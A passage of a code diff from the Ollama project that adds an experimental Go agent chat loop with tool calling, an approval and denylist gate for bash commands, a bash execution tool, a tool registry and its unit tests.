"fmt"
|
||||
"io"
|
||||
"os"
|
||||
"os/signal"
|
||||
"strings"
|
||||
"syscall"
|
||||
|
||||
"github.com/spf13/cobra"
|
||||
"golang.org/x/term"
|
||||
|
||||
"github.com/ollama/ollama/api"
|
||||
"github.com/ollama/ollama/progress"
|
||||
"github.com/ollama/ollama/readline"
|
||||
"github.com/ollama/ollama/types/model"
|
||||
"github.com/ollama/ollama/x/agent"
|
||||
"github.com/ollama/ollama/x/tools"
|
||||
)
|
||||
|
||||
// RunOptions contains options for running an interactive agent session.
|
||||
type RunOptions struct {
|
||||
Model string
|
||||
Messages []api.Message
|
||||
WordWrap bool
|
||||
Format string
|
||||
System string
|
||||
Options map[string]any
|
||||
KeepAlive *api.Duration
|
||||
Think *api.ThinkValue
|
||||
HideThinking bool
|
||||
|
||||
// Agent fields (managed externally for session persistence)
|
||||
Tools *tools.Registry
|
||||
Approval *agent.ApprovalManager
|
||||
}
|
||||
|
||||
// Chat runs an agent chat loop with tool support.
|
||||
// This is the experimental version of chat that supports tool calling.
|
||||
func Chat(ctx context.Context, opts RunOptions) (*api.Message, error) {
|
||||
client, err := api.ClientFromEnvironment()
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
// Use tools registry and approval from opts (managed by caller for session persistence)
|
||||
toolRegistry := opts.Tools
|
||||
approval := opts.Approval
|
||||
if approval == nil {
|
||||
approval = agent.NewApprovalManager()
|
||||
}
|
||||
|
||||
p := progress.NewProgress(os.Stderr)
|
||||
defer p.StopAndClear()
|
||||
|
||||
spinner := progress.NewSpinner("")
|
||||
p.Add("", spinner)
|
||||
|
||||
cancelCtx, cancel := context.WithCancel(ctx)
|
||||
defer cancel()
|
||||
|
||||
sigChan := make(chan os.Signal, 1)
|
||||
signal.Notify(sigChan, syscall.SIGINT)
|
||||
|
||||
go func() {
|
||||
<-sigChan
|
||||
cancel()
|
||||
}()
|
||||
|
||||
var state *displayResponseState = &displayResponseState{}
|
||||
var thinkingContent strings.Builder
|
||||
var fullResponse strings.Builder
|
||||
var thinkTagOpened bool = false
|
||||
var thinkTagClosed bool = false
|
||||
var pendingToolCalls []api.ToolCall
|
||||
|
||||
role := "assistant"
|
||||
messages := opts.Messages
|
||||
|
||||
fn := func(response api.ChatResponse) error {
|
||||
if response.Message.Content != "" || !opts.HideThinking {
|
||||
p.StopAndClear()
|
||||
}
|
||||
|
||||
role = response.Message.Role
|
||||
if response.Message.Thinking != "" && !opts.HideThinking {
|
||||
if !thinkTagOpened {
|
||||
fmt.Print(thinkingOutputOpeningText(false))
|
||||
thinkTagOpened = true
|
||||
thinkTagClosed = false
|
||||
}
|
||||
thinkingContent.WriteString(response.Message.Thinking)
|
||||
displayResponse(response.Message.Thinking, opts.WordWrap, state)
|
||||
}
|
||||
|
||||
content := response.Message.Content
|
||||
if thinkTagOpened && !thinkTagClosed && (content != "" || len(response.Message.ToolCalls) > 0) {
|
||||
if !strings.HasSuffix(thinkingContent.String(), "\n") {
|
||||
fmt.Println()
|
||||
}
|
||||
fmt.Print(thinkingOutputClosingText(false))
|
||||
thinkTagOpened = false
|
||||
thinkTagClosed = true
|
||||
state = &displayResponseState{}
|
||||
}
|
||||
|
||||
fullResponse.WriteString(content)
|
||||
|
||||
if response.Message.ToolCalls != nil {
|
||||
toolCalls := response.Message.ToolCalls
|
||||
if len(toolCalls) > 0 {
|
||||
if toolRegistry != nil {
|
||||
// Store tool calls for execution after response is complete
|
||||
pendingToolCalls = append(pendingToolCalls, toolCalls...)
|
||||
} else {
|
||||
// No tools registry, just display tool calls
|
||||
fmt.Print(renderToolCalls(toolCalls, false))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
displayResponse(content, opts.WordWrap, state)
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
if opts.Format == "json" {
|
||||
opts.Format = `"` + opts.Format + `"`
|
||||
}
|
||||
|
||||
// Agentic loop: continue until no more tool calls
|
||||
for {
|
||||
req := &api.ChatRequest{
|
||||
Model: opts.Model,
|
||||
Messages: messages,
|
||||
Format: json.RawMessage(opts.Format),
|
||||
Options: opts.Options,
|
||||
Think: opts.Think,
|
||||
}
|
||||
|
||||
// Add tools
|
||||
if toolRegistry != nil {
|
||||
apiTools := toolRegistry.Tools()
|
||||
if len(apiTools) > 0 {
|
||||
req.Tools = apiTools
|
||||
}
|
||||
}
|
||||
|
||||
if opts.KeepAlive != nil {
|
||||
req.KeepAlive = opts.KeepAlive
|
||||
}
|
||||
|
||||
if err := client.Chat(cancelCtx, req, fn); err != nil {
|
||||
if errors.Is(err, context.Canceled) {
|
||||
return nil, nil
|
||||
}
|
||||
|
||||
if strings.Contains(err.Error(), "upstream error") {
|
||||
p.StopAndClear()
|
||||
fmt.Println("An error occurred while processing your message. Please try again.")
|
||||
fmt.Println()
|
||||
return nil, nil
|
||||
}
|
||||
return nil, err
|
||||
}
|
||||
|
||||
// If no tool calls, we're done
|
||||
if len(pendingToolCalls) == 0 || toolRegistry == nil {
|
||||
break
|
||||
}
|
||||
|
||||
// Execute tool calls and continue the conversation
|
||||
fmt.Fprintf(os.Stderr, "\n")
|
||||
|
||||
// Add assistant's tool call message to history
|
||||
assistantMsg := api.Message{
|
||||
Role: "assistant",
|
||||
Content: fullResponse.String(),
|
||||
Thinking: thinkingContent.String(),
|
||||
ToolCalls: pendingToolCalls,
|
||||
}
|
||||
messages = append(messages, assistantMsg)
|
||||
|
||||
// Execute each tool call and collect results
|
||||
var toolResults []api.Message
|
||||
for _, call := range pendingToolCalls {
|
||||
toolName := call.Function.Name
|
||||
args := call.Function.Arguments.ToMap()
|
||||
|
||||
// For bash commands, check denylist first
|
||||
skipApproval := false
|
||||
if toolName == "bash" {
|
||||
if cmd, ok := args["command"].(string); ok {
|
||||
// Check if command is denied (dangerous pattern)
|
||||
if denied, pattern := agent.IsDenied(cmd); denied {
|
||||
fmt.Fprintf(os.Stderr, "\033[91m✗ Blocked: %s\033[0m\n", formatToolShort(toolName, args))
|
||||
fmt.Fprintf(os.Stderr, "\033[91m Matches dangerous pattern: %s\033[0m\n", pattern)
|
||||
toolResults = append(toolResults, api.Message{
|
||||
Role: "tool",
|
||||
Content: agent.FormatDeniedResult(cmd, pattern),
|
||||
ToolCallID: call.ID,
|
||||
})
|
||||
continue
|
||||
}
|
||||
|
||||
// Check if command is auto-allowed (safe command)
|
||||
if agent.IsAutoAllowed(cmd) {
|
||||
fmt.Fprintf(os.Stderr, "\033[90m▶ Auto-allowed: %s\033[0m\n", formatToolShort(toolName, args))
|
||||
skipApproval = true
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Check approval (uses prefix matching for bash commands)
|
||||
if !skipApproval && !approval.IsAllowed(toolName, args) {
|
||||
result, err := approval.RequestApproval(toolName, args)
|
||||
if err != nil {
|
||||
fmt.Fprintf(os.Stderr, "Error requesting approval: %v\n", err)
|
||||
toolResults = append(toolResults, api.Message{
|
||||
Role: "tool",
|
||||
Content: fmt.Sprintf("Error: %v", err),
|
||||
ToolCallID: call.ID,
|
||||
})
|
||||
continue
|
||||
}
|
||||
|
||||
// Show collapsed result
|
||||
fmt.Fprintln(os.Stderr, agent.FormatApprovalResult(toolName, args, result))
|
||||
|
||||
switch result.Decision {
|
||||
case agent.ApprovalDeny:
|
||||
toolResults = append(toolResults, api.Message{
|
||||
Role: "tool",
|
||||
Content: agent.FormatDenyResult(toolName, result.DenyReason),
|
||||
ToolCallID: call.ID,
|
||||
})
|
||||
continue
|
||||
case agent.ApprovalAlways:
|
||||
approval.AddToAllowlist(toolName, args)
|
||||
}
|
||||
} else if !skipApproval {
|
||||
// Already allowed - show running indicator
|
||||
fmt.Fprintf(os.Stderr, "\033[90m▶ Running: %s\033[0m\n", formatToolShort(toolName, args))
|
||||
}
|
||||
|
||||
// Execute the tool
|
||||
toolResult, err := toolRegistry.Execute(call)
|
||||
if err != nil {
|
||||
fmt.Fprintf(os.Stderr, "\033[31m Error: %v\033[0m\n", err)
|
||||
toolResults = append(toolResults, api.Message{
|
||||
Role: "tool",
|
||||
Content: fmt.Sprintf("Error: %v", err),
|
||||
ToolCallID: call.ID,
|
||||
})
|
||||
continue
|
||||
}
|
||||
|
||||
// Display tool output (truncated for display)
|
||||
if toolResult != "" {
|
||||
output := toolResult
|
||||
if len(output) > 300 {
|
||||
output = output[:300] + "... (truncated)"
|
||||
}
|
||||
// Show result in grey, indented
|
||||
fmt.Fprintf(os.Stderr, "\033[90m %s\033[0m\n", strings.ReplaceAll(output, "\n", "\n "))
|
||||
}
|
||||
|
||||
toolResults = append(toolResults, api.Message{
|
||||
Role: "tool",
|
||||
Content: toolResult,
|
||||
ToolCallID: call.ID,
|
||||
})
|
||||
}
|
||||
|
||||
// Add tool results to message history
|
||||
messages = append(messages, toolResults...)
|
||||
|
||||
fmt.Fprintf(os.Stderr, "\n")
|
||||
|
||||
// Reset state for next iteration
|
||||
fullResponse.Reset()
|
||||
thinkingContent.Reset()
|
||||
thinkTagOpened = false
|
||||
thinkTagClosed = false
|
||||
pendingToolCalls = nil
|
||||
state = &displayResponseState{}
|
||||
|
||||
// Start new progress spinner for next API call
|
||||
p = progress.NewProgress(os.Stderr)
|
||||
spinner = progress.NewSpinner("")
|
||||
p.Add("", spinner)
|
||||
}
|
||||
|
||||
if len(opts.Messages) > 0 {
|
||||
fmt.Println()
|
||||
fmt.Println()
|
||||
}
|
||||
|
||||
return &api.Message{Role: role, Thinking: thinkingContent.String(), Content: fullResponse.String()}, nil
|
||||
}
|
||||
|
||||
// truncateUTF8 safely truncates a string to at most limit runes, adding "..." if truncated.
|
||||
func truncateUTF8(s string, limit int) string {
|
||||
runes := []rune(s)
|
||||
if len(runes) <= limit {
|
||||
return s
|
||||
}
|
||||
if limit <= 3 {
|
||||
return string(runes[:limit])
|
||||
}
|
||||
return string(runes[:limit-3]) + "..."
|
||||
}
|
||||
|
||||
// formatToolShort returns a short description of a tool call.
|
||||
func formatToolShort(toolName string, args map[string]any) string {
|
||||
if toolName == "bash" {
|
||||
if cmd, ok := args["command"].(string); ok {
|
||||
return fmt.Sprintf("bash: %s", truncateUTF8(cmd, 50))
|
||||
}
|
||||
}
|
||||
if toolName == "web_search" {
|
||||
if query, ok := args["query"].(string); ok {
|
||||
return fmt.Sprintf("web_search: %s", truncateUTF8(query, 50))
|
||||
}
|
||||
}
|
||||
return toolName
|
||||
}
|
||||
|
||||
// Helper types and functions for display
|
||||
|
||||
type displayResponseState struct {
|
||||
lineLength int
|
||||
wordBuffer string
|
||||
}
|
||||
|
||||
func displayResponse(content string, wordWrap bool, state *displayResponseState) {
|
||||
termWidth, _, _ := term.GetSize(int(os.Stdout.Fd()))
|
||||
if wordWrap && termWidth >= 10 {
|
||||
for _, ch := range content {
|
||||
if state.lineLength+1 > termWidth-5 {
|
||||
if len(state.wordBuffer) > termWidth-10 {
|
||||
fmt.Printf("%s%c", state.wordBuffer, ch)
|
||||
state.wordBuffer = ""
|
||||
state.lineLength = 0
|
||||
continue
|
||||
}
|
||||
|
||||
// backtrack the length of the last word and clear to the end of the line
|
||||
a := len(state.wordBuffer)
|
||||
if a > 0 {
|
||||
fmt.Printf("\x1b[%dD", a)
|
||||
}
|
||||
fmt.Printf("\x1b[K\n")
|
||||
fmt.Printf("%s%c", state.wordBuffer, ch)
|
||||
|
||||
state.lineLength = len(state.wordBuffer) + 1
|
||||
} else {
|
||||
fmt.Print(string(ch))
|
||||
state.lineLength++
|
||||
|
||||
switch ch {
|
||||
case ' ', '\t':
|
||||
state.wordBuffer = ""
|
||||
case '\n', '\r':
|
||||
state.lineLength = 0
|
||||
state.wordBuffer = ""
|
||||
default:
|
||||
state.wordBuffer += string(ch)
|
||||
}
|
||||
}
|
||||
}
|
||||
} else {
|
||||
fmt.Printf("%s%s", state.wordBuffer, content)
|
||||
if len(state.wordBuffer) > 0 {
|
||||
state.wordBuffer = ""
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func thinkingOutputOpeningText(plainText bool) string {
|
||||
text := "Thinking...\n"
|
||||
|
||||
if plainText {
|
||||
return text
|
||||
}
|
||||
|
||||
return readline.ColorGrey + readline.ColorBold + text + readline.ColorDefault + readline.ColorGrey
|
||||
}
|
||||
|
||||
func thinkingOutputClosingText(plainText bool) string {
|
||||
text := "...done thinking.\n\n"
|
||||
|
||||
if plainText {
|
||||
return text
|
||||
}
|
||||
|
||||
return readline.ColorGrey + readline.ColorBold + text + readline.ColorDefault
|
||||
}
|
||||
|
||||
func renderToolCalls(toolCalls []api.ToolCall, plainText bool) string {
|
||||
out := ""
|
||||
formatExplanation := ""
|
||||
formatValues := ""
|
||||
if !plainText {
|
||||
formatExplanation = readline.ColorGrey + readline.ColorBold
|
||||
formatValues = readline.ColorDefault
|
||||
out += formatExplanation
|
||||
}
|
||||
for i, toolCall := range toolCalls {
|
||||
argsAsJSON, err := json.Marshal(toolCall.Function.Arguments)
|
||||
if err != nil {
|
||||
return ""
|
||||
}
|
||||
if i > 0 {
|
||||
out += "\n"
|
||||
}
|
||||
out += fmt.Sprintf(" Tool call: %s(%s)", formatValues+toolCall.Function.Name+formatExplanation, formatValues+string(argsAsJSON)+formatExplanation)
|
||||
}
|
||||
if !plainText {
|
||||
out += readline.ColorDefault
|
||||
}
|
||||
return out
|
||||
}
|
||||
|
||||
// checkModelCapabilities checks if the model supports tools.
|
||||
func checkModelCapabilities(ctx context.Context, modelName string) (supportsTools bool, err error) {
|
||||
client, err := api.ClientFromEnvironment()
|
||||
if err != nil {
|
||||
return false, err
|
||||
}
|
||||
|
||||
resp, err := client.Show(ctx, &api.ShowRequest{Model: modelName})
|
||||
if err != nil {
|
||||
return false, err
|
||||
}
|
||||
|
||||
for _, cap := range resp.Capabilities {
|
||||
if cap == model.CapabilityTools {
|
||||
return true, nil
|
||||
}
|
||||
}
|
||||
|
||||
return false, nil
|
||||
}
|
||||
|
||||
// GenerateInteractive runs an interactive agent session.
|
||||
// This is called from cmd.go when --experimental flag is set.
|
||||
func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, options map[string]any, think *api.ThinkValue, hideThinking bool, keepAlive *api.Duration) error {
|
||||
scanner, err := readline.New(readline.Prompt{
|
||||
Prompt: ">>> ",
|
||||
AltPrompt: "... ",
|
||||
Placeholder: "Send a message (/? for help)",
|
||||
AltPlaceholder: `Use """ to end multi-line input`,
|
||||
})
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
fmt.Print(readline.StartBracketedPaste)
|
||||
defer fmt.Printf(readline.EndBracketedPaste)
|
||||
|
||||
// Check if model supports tools
|
||||
supportsTools, err := checkModelCapabilities(cmd.Context(), modelName)
|
||||
if err != nil {
|
||||
fmt.Fprintf(os.Stderr, "\033[33mWarning: Could not check model capabilities: %v\033[0m\n", err)
|
||||
supportsTools = false
|
||||
}
|
||||
|
||||
// Create tool registry only if model supports tools
|
||||
var toolRegistry *tools.Registry
|
||||
if supportsTools {
|
||||
toolRegistry = tools.DefaultRegistry()
|
||||
fmt.Fprintf(os.Stderr, "Tools available: %s\n", strings.Join(toolRegistry.Names(), ", "))
|
||||
|
||||
// Check for OLLAMA_API_KEY for web search
|
||||
if os.Getenv("OLLAMA_API_KEY") == "" {
|
||||
fmt.Fprintf(os.Stderr, "\033[33mWarning: OLLAMA_API_KEY not set - web search will not work\033[0m\n")
|
||||
}
|
||||
} else {
|
||||
fmt.Fprintf(os.Stderr, "\033[33mNote: Model does not support tools - running in chat-only mode\033[0m\n")
|
||||
}
|
||||
|
||||
// Create approval manager for session
|
||||
approval := agent.NewApprovalManager()
|
||||
|
||||
var messages []api.Message
|
||||
var sb strings.Builder
|
||||
|
||||
for {
|
||||
line, err := scanner.Readline()
|
||||
switch {
|
||||
case errors.Is(err, io.EOF):
|
||||
fmt.Println()
|
||||
return nil
|
||||
case errors.Is(err, readline.ErrInterrupt):
|
||||
if line == "" {
|
||||
fmt.Println("\nUse Ctrl + d or /bye to exit.")
|
||||
}
|
||||
sb.Reset()
|
||||
continue
|
||||
case err != nil:
|
||||
return err
|
||||
}
|
||||
|
||||
switch {
|
||||
case strings.HasPrefix(line, "/exit"), strings.HasPrefix(line, "/bye"):
|
||||
return nil
|
||||
case strings.HasPrefix(line, "/clear"):
|
||||
messages = []api.Message{}
|
||||
approval.Reset()
|
||||
fmt.Println("Cleared session context and tool approvals")
|
||||
continue
|
||||
case strings.HasPrefix(line, "/tools"):
|
||||
showToolsStatus(toolRegistry, approval, supportsTools)
|
||||
continue
|
||||
case strings.HasPrefix(line, "/help"), strings.HasPrefix(line, "/?"):
|
||||
fmt.Fprintln(os.Stderr, "Available Commands:")
|
||||
fmt.Fprintln(os.Stderr, " /tools Show available tools and approvals")
|
||||
fmt.Fprintln(os.Stderr, " /clear Clear session context and approvals")
|
||||
fmt.Fprintln(os.Stderr, " /bye Exit")
|
||||
fmt.Fprintln(os.Stderr, " /?, /help Help for a command")
|
||||
fmt.Fprintln(os.Stderr, "")
|
||||
continue
|
||||
case strings.HasPrefix(line, "/"):
|
||||
fmt.Printf("Unknown command '%s'. Type /? for help\n", strings.Fields(line)[0])
|
||||
continue
|
||||
default:
|
||||
sb.WriteString(line)
|
||||
}
|
||||
|
||||
if sb.Len() > 0 {
|
||||
newMessage := api.Message{Role: "user", Content: sb.String()}
|
||||
messages = append(messages, newMessage)
|
||||
|
||||
opts := RunOptions{
|
||||
Model: modelName,
|
||||
Messages: messages,
|
||||
WordWrap: wordWrap,
|
||||
Options: options,
|
||||
Think: think,
|
||||
HideThinking: hideThinking,
|
||||
KeepAlive: keepAlive,
|
||||
Tools: toolRegistry,
|
||||
Approval: approval,
|
||||
}
|
||||
|
||||
assistant, err := Chat(cmd.Context(), opts)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if assistant != nil {
|
||||
messages = append(messages, *assistant)
|
||||
}
|
||||
|
||||
sb.Reset()
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// showToolsStatus displays the current tools and approval status.
|
||||
func showToolsStatus(registry *tools.Registry, approval *agent.ApprovalManager, supportsTools bool) {
|
||||
if !supportsTools || registry == nil {
|
||||
fmt.Println("Tools not available - model does not support tool calling")
|
||||
fmt.Println()
|
||||
return
|
||||
}
|
||||
|
||||
fmt.Println("Available tools:")
|
||||
for _, name := range registry.Names() {
|
||||
tool, _ := registry.Get(name)
|
||||
fmt.Printf(" %s - %s\n", name, tool.Description())
|
||||
}
|
||||
|
||||
allowed := approval.AllowedTools()
|
||||
if len(allowed) > 0 {
|
||||
fmt.Println("\nSession approvals:")
|
||||
for _, key := range allowed {
|
||||
fmt.Printf(" %s\n", key)
|
||||
}
|
||||
} else {
|
||||
fmt.Println("\nNo tools approved for this session yet")
|
||||
}
|
||||
fmt.Println()
|
||||
}
|
||||
|
|
@ -0,0 +1,114 @@
|
|||
package tools
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"context"
|
||||
"fmt"
|
||||
"os/exec"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"github.com/ollama/ollama/api"
|
||||
)
|
||||
|
||||
const (
|
||||
// bashTimeout is the maximum execution time for a command.
|
||||
bashTimeout = 60 * time.Second
|
||||
// maxOutputSize is the maximum output size in bytes.
|
||||
maxOutputSize = 50000
|
||||
)
|
||||
|
||||
// BashTool implements shell command execution.
|
||||
type BashTool struct{}
|
||||
|
||||
// Name returns the tool name.
|
||||
func (b *BashTool) Name() string {
|
||||
return "bash"
|
||||
}
|
||||
|
||||
// Description returns a description of the tool.
|
||||
func (b *BashTool) Description() string {
|
||||
return "Execute a bash command on the system. Use this to run shell commands, check files, run programs, etc."
|
||||
}
|
||||
|
||||
// Schema returns the tool's parameter schema.
|
||||
func (b *BashTool) Schema() api.ToolFunction {
|
||||
props := api.NewToolPropertiesMap()
|
||||
props.Set("command", api.ToolProperty{
|
||||
Type: api.PropertyType{"string"},
|
||||
Description: "The bash command to execute",
|
||||
})
|
||||
return api.ToolFunction{
|
||||
Name: b.Name(),
|
||||
Description: b.Description(),
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: props,
|
||||
Required: []string{"command"},
|
||||
},
|
||||
}
|
||||
}
|
||||
|
||||
// Execute runs the bash command.
|
||||
func (b *BashTool) Execute(args map[string]any) (string, error) {
|
||||
command, ok := args["command"].(string)
|
||||
if !ok || command == "" {
|
||||
return "", fmt.Errorf("command parameter is required")
|
||||
}
|
||||
|
||||
// Create context with timeout
|
||||
ctx, cancel := context.WithTimeout(context.Background(), bashTimeout)
|
||||
defer cancel()
|
||||
|
||||
// Execute command
|
||||
cmd := exec.CommandContext(ctx, "bash", "-c", command)
|
||||
|
||||
var stdout, stderr bytes.Buffer
|
||||
cmd.Stdout = &stdout
|
||||
cmd.Stderr = &stderr
|
||||
|
||||
err := cmd.Run()
|
||||
|
||||
// Build output
|
||||
var sb strings.Builder
|
||||
|
||||
// Add stdout
|
||||
if stdout.Len() > 0 {
|
||||
output := stdout.String()
|
||||
if len(output) > maxOutputSize {
|
||||
output = output[:maxOutputSize] + "\n... (output truncated)"
|
||||
}
|
||||
sb.WriteString(output)
|
||||
}
|
||||
|
||||
// Add stderr if present
|
||||
if stderr.Len() > 0 {
|
||||
stderrOutput := stderr.String()
|
||||
if len(stderrOutput) > maxOutputSize {
|
||||
stderrOutput = stderrOutput[:maxOutputSize] + "\n... (stderr truncated)"
|
||||
}
|
||||
if sb.Len() > 0 {
|
||||
sb.WriteString("\n")
|
||||
}
|
||||
sb.WriteString("stderr:\n")
|
||||
sb.WriteString(stderrOutput)
|
||||
}
|
||||
|
||||
// Handle errors
|
||||
if err != nil {
|
||||
if ctx.Err() == context.DeadlineExceeded {
|
||||
return sb.String() + "\n\nError: command timed out after 60 seconds", nil
|
||||
}
|
||||
// Include exit code in output but don't return as error
|
||||
if exitErr, ok := err.(*exec.ExitError); ok {
|
||||
return sb.String() + fmt.Sprintf("\n\nExit code: %d", exitErr.ExitCode()), nil
|
||||
}
|
||||
return sb.String(), fmt.Errorf("executing command: %w", err)
|
||||
}
|
||||
|
||||
if sb.Len() == 0 {
|
||||
return "(no output)", nil
|
||||
}
|
||||
|
||||
return sb.String(), nil
|
||||
}
|
||||
|
|
@ -0,0 +1,96 @@
|
|||
// Package tools provides built-in tool implementations for the agent loop.
|
||||
package tools
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"sort"
|
||||
|
||||
"github.com/ollama/ollama/api"
|
||||
)
|
||||
|
||||
// Tool defines the interface for agent tools.
|
||||
type Tool interface {
|
||||
// Name returns the tool's unique identifier.
|
||||
Name() string
|
||||
// Description returns a human-readable description of what the tool does.
|
||||
Description() string
|
||||
// Schema returns the tool's parameter schema for the LLM.
|
||||
Schema() api.ToolFunction
|
||||
// Execute runs the tool with the given arguments.
|
||||
Execute(args map[string]any) (string, error)
|
||||
}
|
||||
|
||||
// Registry manages available tools.
|
||||
type Registry struct {
|
||||
tools map[string]Tool
|
||||
}
|
||||
|
||||
// NewRegistry creates a new tool registry.
|
||||
func NewRegistry() *Registry {
|
||||
return &Registry{
|
||||
tools: make(map[string]Tool),
|
||||
}
|
||||
}
|
||||
|
||||
// Register adds a tool to the registry.
|
||||
func (r *Registry) Register(tool Tool) {
|
||||
r.tools[tool.Name()] = tool
|
||||
}
|
||||
|
||||
// Get retrieves a tool by name.
|
||||
func (r *Registry) Get(name string) (Tool, bool) {
|
||||
tool, ok := r.tools[name]
|
||||
return tool, ok
|
||||
}
|
||||
|
||||
// Tools returns all registered tools in Ollama API format, sorted by name.
|
||||
func (r *Registry) Tools() api.Tools {
|
||||
// Get sorted names for deterministic ordering
|
||||
names := make([]string, 0, len(r.tools))
|
||||
for name := range r.tools {
|
||||
names = append(names, name)
|
||||
}
|
||||
sort.Strings(names)
|
||||
|
||||
var tools api.Tools
|
||||
for _, name := range names {
|
||||
tool := r.tools[name]
|
||||
tools = append(tools, api.Tool{
|
||||
Type: "function",
|
||||
Function: tool.Schema(),
|
||||
})
|
||||
}
|
||||
return tools
|
||||
}
|
||||
|
||||
// Execute runs a tool call and returns the result.
|
||||
func (r *Registry) Execute(call api.ToolCall) (string, error) {
|
||||
tool, ok := r.tools[call.Function.Name]
|
||||
if !ok {
|
||||
return "", fmt.Errorf("unknown tool: %s", call.Function.Name)
|
||||
}
|
||||
return tool.Execute(call.Function.Arguments.ToMap())
|
||||
}
|
||||
|
||||
// Names returns the names of all registered tools, sorted alphabetically.
|
||||
func (r *Registry) Names() []string {
|
||||
names := make([]string, 0, len(r.tools))
|
||||
for name := range r.tools {
|
||||
names = append(names, name)
|
||||
}
|
||||
sort.Strings(names)
|
||||
return names
|
||||
}
|
||||
|
||||
// Count returns the number of registered tools.
|
||||
func (r *Registry) Count() int {
|
||||
return len(r.tools)
|
||||
}
|
||||
|
||||
// DefaultRegistry creates a registry with all built-in tools.
|
||||
func DefaultRegistry() *Registry {
|
||||
r := NewRegistry()
|
||||
r.Register(&WebSearchTool{})
|
||||
r.Register(&BashTool{})
|
||||
return r
|
||||
}
|
||||
|
|
@ -0,0 +1,143 @@
|
|||
package tools
|
||||
|
||||
import (
|
||||
"testing"
|
||||
|
||||
"github.com/ollama/ollama/api"
|
||||
)
|
||||
|
||||
func TestRegistry_Register(t *testing.T) {
|
||||
r := NewRegistry()
|
||||
|
||||
r.Register(&BashTool{})
|
||||
r.Register(&WebSearchTool{})
|
||||
|
||||
if r.Count() != 2 {
|
||||
t.Errorf("expected 2 tools, got %d", r.Count())
|
||||
}
|
||||
|
||||
names := r.Names()
|
||||
if len(names) != 2 {
|
||||
t.Errorf("expected 2 names, got %d", len(names))
|
||||
}
|
||||
}
|
||||
|
||||
func TestRegistry_Get(t *testing.T) {
|
||||
r := NewRegistry()
|
||||
r.Register(&BashTool{})
|
||||
|
||||
tool, ok := r.Get("bash")
|
||||
if !ok {
|
||||
t.Fatal("expected to find bash tool")
|
||||
}
|
||||
|
||||
if tool.Name() != "bash" {
|
||||
t.Errorf("expected name 'bash', got '%s'", tool.Name())
|
||||
}
|
||||
|
||||
_, ok = r.Get("nonexistent")
|
||||
if ok {
|
||||
t.Error("expected not to find nonexistent tool")
|
||||
}
|
||||
}
|
||||
|
||||
func TestRegistry_Tools(t *testing.T) {
|
||||
r := NewRegistry()
|
||||
r.Register(&BashTool{})
|
||||
r.Register(&WebSearchTool{})
|
||||
|
||||
tools := r.Tools()
|
||||
if len(tools) != 2 {
|
||||
t.Errorf("expected 2 tools, got %d", len(tools))
|
||||
}
|
||||
|
||||
for _, tool := range tools {
|
||||
if tool.Type != "function" {
|
||||
t.Errorf("expected type 'function', got '%s'", tool.Type)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestRegistry_Execute(t *testing.T) {
|
||||
r := NewRegistry()
|
||||
r.Register(&BashTool{})
|
||||
|
||||
// Test successful execution
|
||||
args := api.NewToolCallFunctionArguments()
|
||||
args.Set("command", "echo hello")
|
||||
result, err := r.Execute(api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "bash",
|
||||
Arguments: args,
|
||||
},
|
||||
})
|
||||
if err != nil {
|
||||
t.Fatalf("unexpected error: %v", err)
|
||||
}
|
||||
if result != "hello\n" {
|
||||
t.Errorf("expected 'hello\\n', got '%s'", result)
|
||||
}
|
||||
|
||||
// Test unknown tool
|
||||
_, err = r.Execute(api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "unknown",
|
||||
Arguments: api.NewToolCallFunctionArguments(),
|
||||
},
|
||||
})
|
||||
if err == nil {
|
||||
t.Error("expected error for unknown tool")
|
||||
}
|
||||
}
|
||||
|
||||
func TestDefaultRegistry(t *testing.T) {
|
||||
r := DefaultRegistry()
|
||||
|
||||
if r.Count() != 2 {
|
||||
t.Errorf("expected 2 tools in default registry, got %d", r.Count())
|
||||
}
|
||||
|
||||
_, ok := r.Get("bash")
|
||||
if !ok {
|
||||
t.Error("expected bash tool in default registry")
|
||||
}
|
||||
|
||||
_, ok = r.Get("web_search")
|
||||
if !ok {
|
||||
t.Error("expected web_search tool in default registry")
|
||||
}
|
||||
}
|
||||
|
||||
func TestBashTool_Schema(t *testing.T) {
|
||||
tool := &BashTool{}
|
||||
|
||||
schema := tool.Schema()
|
||||
if schema.Name != "bash" {
|
||||
t.Errorf("expected name 'bash', got '%s'", schema.Name)
|
||||
}
|
||||
|
||||
if schema.Parameters.Type != "object" {
|
||||
t.Errorf("expected parameters type 'object', got '%s'", schema.Parameters.Type)
|
||||
}
|
||||
|
||||
if _, ok := schema.Parameters.Properties.Get("command"); !ok {
|
||||
t.Error("expected 'command' property in schema")
|
||||
}
|
||||
}
|
||||
|
||||
func TestWebSearchTool_Schema(t *testing.T) {
|
||||
tool := &WebSearchTool{}
|
||||
|
||||
schema := tool.Schema()
|
||||
if schema.Name != "web_search" {
|
||||
t.Errorf("expected name 'web_search', got '%s'", schema.Name)
|
||||
}
|
||||
|
||||
if schema.Parameters.Type != "object" {
|
||||
t.Errorf("expected parameters type 'object', got '%s'", schema.Parameters.Type)
|
||||
}
|
||||
|
||||
if _, ok := schema.Parameters.Properties.Get("query"); !ok {
|
||||
t.Error("expected 'query' property in schema")
|
||||
}
|
||||
}
|
||||
|
|
@ -0,0 +1,148 @@
|
|||
package tools
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"io"
|
||||
"net/http"
|
||||
"os"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"github.com/ollama/ollama/api"
|
||||
)
|
||||
|
||||
const (
|
||||
webSearchAPI = "https://ollama.com/api/web_search"
|
||||
webSearchTimeout = 15 * time.Second
|
||||
)
|
||||
|
||||
